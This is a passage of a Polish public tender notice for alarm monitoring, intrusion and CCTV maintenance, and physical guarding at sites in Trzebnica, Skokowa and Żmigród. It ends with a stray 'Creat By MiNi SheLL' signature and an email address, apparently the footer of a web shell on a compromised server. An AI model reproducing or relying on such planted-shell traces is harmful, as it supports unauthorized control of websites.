c). czas dojazdu i podjęcie interwencji przez grupę interwencyjną wyniesie : w porze nocnej tj. od godziny 19.00 do godziny 6.00 do 10 minut, a w porze dziennej tj. od 6.00 do 19.00 do 15 minut.
1. Na czas obowiązywania umowy Zleceniobiorca użycza Abonentowi nadajnik GPRS -1 kpl. wraz z kartą SIM z aktywacją.
2. Po zakończeniu trwania umowy Abonent  zwróci urządzenia w stanie nie pogorszonym.
3. W przypadku utraty lub uszkodzenia urządzeń wymienionych w pkt. 1 Abonent  zobowiązuje się do pokrycia kosztów związanych z zakupem nowych urządzeń.
2. monitorowanie lokalnego systemu alarmowego zainstalowanego w obiekcie położonym w  Skokowej przy ul. Kościelnej  Orlik,  poprzez :
a). całodobowe monitorowanie lokalnego systemu alarmowego Abonenta drogą  GPRS GSM  w tym przyjmowanie informacji o stanie naruszenia systemu alarmowego monitorowanego obiektu i przekazywanie jej osobom upoważnionym przez Abonenta oraz Policji i Straży Pożarnej,
b). ochronę bezpośrednią obiektu poprzez uruchomienie grupy interwencyjnej, która po uzyskaniu sygnału o zagrożeniu obiektu, podejmie  czynne działania interwencyjne,
c). czas dojazdu i podjęcie interwencji przez grupę interwencyjną wyniesie : w porze nocnej tj. od godziny 19.00 do godziny 6.00 od 10 do 15 minut, a w porze dziennej tj. od 6.00 do 19.00 od 15 do 20 minut.
1. Na czas obowiązywania umowy Zleceniobiorca użycza Abonentowi nadajnik GPRS - LX  20 - 1 kpl. wraz z kartą SIM 
2. Po zakończeniu trwania umowy Abonent  zwróci urządzenia w stanie nie pogorszonym.
3. W przypadku utraty lub uszkodzenia urządzeń wymienionych w pkt. 1 Abonent  zobowiązuje się do pokrycia kosztów związanych z zakupem nowych urządzeń.

3. monitorowanie lokalnych systemów alarmowych zainstalowanych w  obiektach położonych w Trzebnicy przy ul. Ks. Dz. W Bochenka 6 i Leśnej 1,  poprzez :
a). całodobowe monitorowanie lokalnego systemu alarmowego Abonenta drogą  telefoniczną - GSM - GPRS   w tym przyjmowanie informacji o stanie naruszenia systemu alarmowego monitorowanego obiektu i przekazywanie jej osobom upoważnionym przez Abonenta,
b). ochronę bezpośrednią obiektu poprzez uruchomienie grupy interwencyjnej , która po uzyskaniu sygnału o zagrożeniu obiektu, podejmie niezwłocznie  czynne działania interwencyjne,
c). czas podjęcia interwencji w porze dziennej tj, od 6.00 do 19.00 wynosić będzie od 10 do 15 minut, a w porze nocnej tj. od 19.00 do 6.00 wynosić będzie od 5 do 10 minut,
d). dokonywanie codziennie pomiędzy 22.00 a 6.00, jednego prewencyjnego podjazdu przez grupę interwencyjną pod obiekt przy ul. Leśnej 1.
2. Działania grupy interwencyjnej zmierzać będzie do udaremnienia powstania szkody na osobie lub mieniu Abonenta.
Na czas obowiązywania umowy Zleceniobiorca użycza  Abonentowi kartę SIM z aktywacją 
Po zakończeniu trwania umowy Abonent  zwróci użyczoną kartę SIM.
W przypadku utraty lub uszkodzenia karty SIM wymienionej w pkt. 1 Abonent  zobowiązuje się do pokrycia kosztów związanych z wydaniem duplikatu karty.


4. konserwacja urządzeń systemu sygnalizacji włamania i napadu oraz CCTV zainstalowanych w obiektach Zamawiającego w Trzebnicy przy ul. Ks.Dz.W.Bochenka 6 oraz przy ul.Leśnej 1.

	Wykonawca zobowiązany jest do dokonywania technicznych czynności konserwacyjnych urządzeń systemu sygnalizacji włamania i napadu oraz CCTV, poprzez :
a). sprawdzenie i wyregulowanie centrali, czujek, manipulatorów, sygnalizatorów zasilania awaryjnego oraz pozostałych urządzeń systemu sygnalizacji włamania i napadu oraz CCTV wymienionych w dzienniku konserwacji,
b). wymiany niesprawnych elementów na elementy sprawne technicznie,
c). sprawdzenie parametrów linii, stanu zasilania awaryjnego - pomiaru napięć w punktach kontrolnych,
d). sprawdzenie poprawności działania całego systemu poprzez wywoływanie próbnego alarmu w obecności osoby upoważnionej przez Zleceniodawcę,
e). sporządzenie protokołu z czynności konserwacyjnych.
Wykonawca będzie dokonywał konserwacji urządzeń systemu sygnalizacji włamań i napadu oraz CCTV raz na kwartał.

Czynności konserwacyjne, nie obejmują :
a). uszkodzeń mechanicznych oraz elektrycznych instalacji, spowodowanych ingerencją osób niepowołanych,
b). uszkodzeń spowodowanych innymi wypadkami losowymi oraz wadami i uszkodzeniami powstałymi w wyniku eksploatowania w warunkach niezgodnych z instrukcja obsługi systemu sygnalizacji włamań i napadu.
c). uszkodzeń spowodowanych niekorzystnymi warunkami atmosferycznymi,
d). kosztów zakupu  baterii, akumulatorów i innych elementów systemu włamania i napadu oraz CCTV itp.
Ponadto Wykonawca zobowiązuje się do odpłatnego dokonywania napraw urządzeń i instalacji systemy sygnalizacji włamania i napadu oraz CCTV, określonych w punkcie powyższym,  zgłoszonych przez Zamawiającego lub stwierdzonych podczas  czynności konserwacyjnych.
Do obowiązków Zamawiającego   należy :
a). zabezpieczenie urządzeń systemu sygnalizacji włamań i napadu oraz CCTV przed dostępem i manipulacją osób niepowołanych,
b). na każde żądanie konserwatora udostępnić mu urządzenia będące przedmiotem konserwacji,
Wykonawca zobowiązany jest do podjęcia działań zmierzających do usunięcia usterek, które wystąpią w pracy systemu sygnalizacji włamań i napadu oraz CCTV, w okresie do 24 godzin od chwili przyjęcia zgłoszenia.
W okresie pomiędzy zgłoszeniem konieczności dokonania naprawy a jej wykonaniem, bez względu na to, która z umawiających się stron zgłosiła taką konieczność, Zamawiający  zabezpieczy swoje mienie we własnym zakresie. Obowiązek ten może przejąć Wykonawca na podstawie odrębnej umowy z Zamawiającym.

5.	 konserwacja urządzeń systemu sygnalizacji włamania i napadu zainstalowanych w obiekcie Zleceniodawcy w Skokowej przy ul. Kościelnej Orlik

Wykonawca zobowiązany jest do dokonywania technicznych czynności konserwacyjnych urządzeń systemu sygnalizacji włamania i napadu, poprzez :
a). sprawdzenie i wyregulowanie centrali, czujek, manipulatorów, sygnalizatorów zasilania awaryjnego oraz pozostałych urządzeń systemu sygnalizacji włamania i napadu, wymienionych w dzienniku konserwacji,
b). wymiany niesprawnych elementów na elementy sprawne technicznie,
c). sprawdzenie parametrów linii, stanu zasilania awaryjnego - pomiaru napięć w punktach kontrolnych,
d). sprawdzenie poprawności działania całego systemu poprzez wywoływanie próbnego alarmu w obecności osoby upoważnionej przez Zamawiającego,
e). sporządzenie protokołu z przeglądu  konserwacyjnego 
Wykonawca będzie dokonywał konserwacji urządzeń systemu sygnalizacji włamań i napadu raz na pół roku.
Czynności konserwacyjne,  nie obejmują :
a). uszkodzeń mechanicznych oraz elektrycznych instalacji, spowodowanych ingerencją osób niepowołanych,
b). uszkodzeń spowodowanych innymi wypadkami losowymi oraz wadami i uszkodzeniami powstałymi w wyniku eksploatowania w warunkach niezgodnych z instrukcja obsługi systemu sygnalizacji włamań i napadu.
c). uszkodzeń spowodowanych niekorzystnymi warunkami atmosferycznymi,
d). kosztów zakupu  baterii, akumulatorów i innych elementów systemu alarmowego itp.
Ponadto Wykonawca zobowiązany jest do odpłatnego dokonywania napraw urządzeń i instalacji systemy sygnalizacji włamania i napadu, zgłoszonych przez Zamawiającego lub stwierdzonych podczas  czynności konserwacyjnych.
Do obowiązków Zamawiającego   należy :
a). zabezpieczenie urządzeń systemu sygnalizacji włamań i napadu przed dostępem i manipulacją osób niepowołanych,
b). na każde żądanie konserwatora udostępnić mu urządzenia będące przedmiotem konserwacji,
Wykonawca zobowiązany jest do podjęcia działań zmierzających do usunięcia usterek, które wystąpią w pracy systemu sygnalizacji włamań i napadu, w okresie do 24 godzin od chwili przyjęcia zgłoszenia.
W okresie pomiędzy zgłoszeniem konieczności dokonania naprawy a jej wykonaniem, bez względu na to, która z umawiających się stron zgłosiła taką konieczność, Zamawiający  zabezpieczy swoje mienie we własnym zakresie. Obowiązek ten może przejąć Wykonawca na podstawie odrębnej umowy z Zamawiającym.
6.konserwacja urządzeń systemu sygnalizacji włamania i napadu zainstalowanych w obiekcie Zamawiającego w Trzebnicy przy ul. Solnej 6.
Wykonawca zobowiązany jest do dokonywania technicznych czynności konserwacyjnych urządzeń systemu sygnalizacji włamania i napadu, poprzez :
a). sprawdzenie i wyregulowanie centrali, czujek, manipulatorów, sygnalizatorów zasilania awaryjnego oraz pozostałych urządzeń systemu sygnalizacji włamania i napadu, wymienionych w dzienniku konserwacji,
b). wymiany niesprawnych elementów na elementy sprawne technicznie,
c). sprawdzenie parametrów linii, stanu zasilania awaryjnego - pomiaru napięć w punktach kontrolnych,
d). sprawdzenie poprawności działania całego systemu poprzez wywoływanie próbnego alarmu w obecności osoby upoważnionej przez Zleceniodawcę,
e). sporządzenie protokołu z przeglądu konserwacyjnego 
Wykonawca będzie dokonywał konserwacji urządzeń systemu sygnalizacji włamań i napadu raz na pół roku.
Czynności konserwacyjne,  nie obejmują :
a). uszkodzeń mechanicznych oraz elektrycznych instalacji, spowodowanych ingerencją osób niepowołanych,
b). uszkodzeń spowodowanych innymi wypadkami losowymi oraz wadami i uszkodzeniami powstałymi w wyniku eksploatowania w warunkach niezgodnych z instrukcja obsługi systemu sygnalizacji włamań i napadu.
c). uszkodzeń spowodowanych niekorzystnymi warunkami atmosferycznymi,
d). kosztów zakupu  baterii, akumulatorów i innych elementów systemu alarmowego itp.
Ponadto Wykonawca zobowiązany jest do odpłatnego dokonywania napraw urządzeń i instalacji systemy sygnalizacji włamania i napadu, określonych w punkcie powyższym,  zgłoszonych przez Zleceniodawcę lub stwierdzonych podczas  czynności konserwacyjnych.
Do obowiązków Zamawiającego   należy :
a). zabezpieczenie urządzeń systemu sygnalizacji włamań i napadu przed dostępem i manipulacją osób niepowołanych,
b). na każde żądanie konserwatora udostępnić mu urządzenia będące przedmiotem konserwacji,
Wykonawca zobowiązany jest  do podjęcia działań zmierzających do usunięcia usterek, które wystąpią w pracy systemu sygnalizacji włamań i napadu, w okresie do 24 godzin od chwili przyjęcia zgłoszenia.
W okresie pomiędzy zgłoszeniem konieczności dokonania naprawy a jej wykonaniem, bez względu na to, która z umawiających się stron zgłosiła taką konieczność, Zamawiający  zabezpieczy swoje mienie we własnym zakresie. Obowiązek ten może przejąć Wykonawca na podstawie odrębnej umowy z Zamawiającym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 79.71.10.00-1, 50.34.00.00-0, 50.70.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II
1.Ochrona fizyczna mienia na terenie obiektu położonego w Żmigrodzie przy ul. Poznańskiej 8..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II
Usługa ochrony mienia na terenie obiektu Zamawiającego położonego w miejscowości Żmigród przy ul. Poznańskiej nr 8, na następujących warunkach: 
Ochrona fizyczna, polegająca na dozorze mienia Zamawiającego przez jednego nie licencjonowanego pracownika w następującym systemie:
Praca w godzinach od 20:00 do 08:00 od poniedziałku do niedzieli,
Ochrona ma polegać na dozorze przed kradzieżą, kradzieżą z włamaniem oraz przeciwdziałaniu skutkom pożaru. Przez włamanie rozumie się bezprawne wtargnięcie do strzeżonych obiektów osób nieupoważnionych, pozostawiające ślady włamania zewnętrznego oraz zabór mienia

Mienie Zamawiającego obejmujące zewidencjonowane środki trwałe znajdujące się na terenie obiektu, zostaną przyjęte przez Wykonawcę do dozoru na podstawie stosownego protokołu, aktualizowanego każdorazowo zgodnie ze stanem faktycznym.

W przypadku stwierdzenia faktu włamania, kradzieży z włamaniem, zniszczenia bądź uszkodzenia dozorowanego przez Wykonawcę mienia jest on zobowiązany natychmiast powiadomić Zamawiającego (telefonicznie oraz mailowo) i ustalić termin, w którym strony protokolarnie dokonają wskazania braków, uszkodzeń w mieniu według spisu z natury i porównania z faktycznym stanem po zaistnieniu w/w zdarzeń. W przypadku nieprzystąpienia przez Wykonawcę do spisywania protokołu, protokół jednostronnie sporządzi Zamawiający..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com